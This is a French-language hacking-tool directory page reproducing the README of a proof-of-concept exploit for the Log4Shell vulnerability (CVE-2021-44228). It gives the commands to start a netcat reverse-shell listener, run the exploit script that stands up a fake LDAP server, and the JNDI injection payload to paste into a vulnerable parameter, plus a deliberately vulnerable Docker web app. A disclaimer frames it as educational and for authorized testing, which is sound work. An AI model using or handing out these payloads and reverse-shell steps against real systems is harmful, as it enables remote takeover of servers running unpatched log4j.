Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j-shell-poc — Une preuve de concept pour la vulnérabilité CVE-2021-44228. | Kitploit
Outils/GitHubGitHub/ocastel/log4j-shell-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubocastel/log4j-shell-poc

log4j-shell-poc

Une preuve de concept pour la vulnérabilité CVE-2021-44228.

Voir le dépôt
il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4j-shell-poc

Une preuve de concept pour la vulnérabilité CVE-2021-44228 récemment découverte.

Récemment, une nouvelle vulnérabilité a été découverte dans log4j, une bibliothèque de journalisation Java très largement utilisée dans des projets comme elasticsearch, minecraft et de nombreux autres.

Dans ce dépôt, nous avons créé une application vulnérable d'exemple et une preuve de concept (POC) d'exploitation de cette vulnérabilité.

Une vidéo montrant le processus d'exploitation

Application Web vulnérable :

https://user-images.githubusercontent.com/87979263/146113359-20663eaa-555d-4d60-828d-a7f769ebd266.mp4


Ghidra (ancien script) :

https://user-images.githubusercontent.com/87979263/145728478-b4686da9-17d0-4511-be74-c6e6fff97740.mp4


Minecraft PoC (ancien script) :

https://user-images.githubusercontent.com/87979263/145681727-2bfd9884-a3e6-45dd-92e2-a624f29a8863.mp4

Preuve de concept (POC)

Comme preuve de concept, nous avons créé un fichier Python qui automatise le processus.

Prérequis :

root@kitploit:~
pip install -r requirements.txt

Utilisation :

  • Démarrez un listener netcat pour accepter la connexion du reverse shell.
root@kitploit:~
nc -lvnp 9001
  • Lancez l'exploit.
    Remarque : Pour que cela fonctionne, l'archive Java extraite doit être nommée : jdk1.8.0_20, et se trouver dans le même répertoire.
root@kitploit:~
$ python3 poc.py --userip localhost --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://localhost:1389/a}

Listening on 0.0.0.0:1389

Ce script configurera le serveur HTTP et le serveur LDAP pour vous, et créera également le payload que vous pourrez coller dans le paramètre vulnérable. Ensuite, si tout s'est bien passé, vous devriez obtenir un shell sur le lport.


Notre application vulnérable

Nous avons ajouté un Dockerfile contenant l'application web vulnérable. Vous pouvez l'utiliser en suivant les étapes ci-dessous :

root@kitploit:~
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc

Une fois qu'elle est lancée, vous pouvez y accéder sur localhost:8080

Si vous souhaitez développer davantage le projet, vous pouvez utiliser l'IDE Intellij que nous avons utilisé pour développer le projet. Nous avons également inclus un dossier .idea contenant des fichiers de configuration qui facilitent un peu le travail. Vous pouvez probablement utiliser d'autres IDE également.


Obtenir la version de Java.

Au moment de créer l'exploit, nous n'étions pas sûrs des versions de Java qui fonctionnent et de celles qui ne fonctionnent pas, nous avons donc choisi de travailler avec l'une des toutes premières versions de Java 8 : java-8u20.

Heureusement, Oracle fournit une archive pour toutes les versions précédentes de Java :
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
Faites défiler jusqu'à 8u20 et téléchargez les fichiers appropriés pour votre système d'exploitation et votre matériel. Screenshot from 2021-12-11 00-09-25

Remarque : Vous devez créer un compte pour pouvoir télécharger le package.

Une fois que vous avez téléchargé et extrait l'archive, vous pouvez trouver java et quelques binaires associés dans jdk1.8.0_20/bin.
Remarque : Assurez-vous d'extraire le dossier jdk dans ce dépôt avec le même nom pour que cela fonctionne.

root@kitploit:~
❯ tar -xf jdk-8u20-linux-x64.tar.gz

❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)

Avertissement

Ce dépôt n'a pas pour but d'être un exploit en un clic pour CVE-2021-44228. Le but de ce projet est d'aider les gens à en apprendre davantage sur cette formidable vulnérabilité, et peut-être à tester leurs propres applications (il existe cependant de meilleures applications à cette fin, par exemple : https://log4shell.tools/).

Notre équipe n'aidera pas et n'approuvera aucune utilisation de cet exploit à des fins malveillantes. Ainsi, si vous demandez de l'aide, il pourra vous être demandé de nous fournir la preuve que vous possédez le service cible ou que vous avez l'autorisation d'effectuer un test d'intrusion (pentest) dessus.

Télécharger l’outil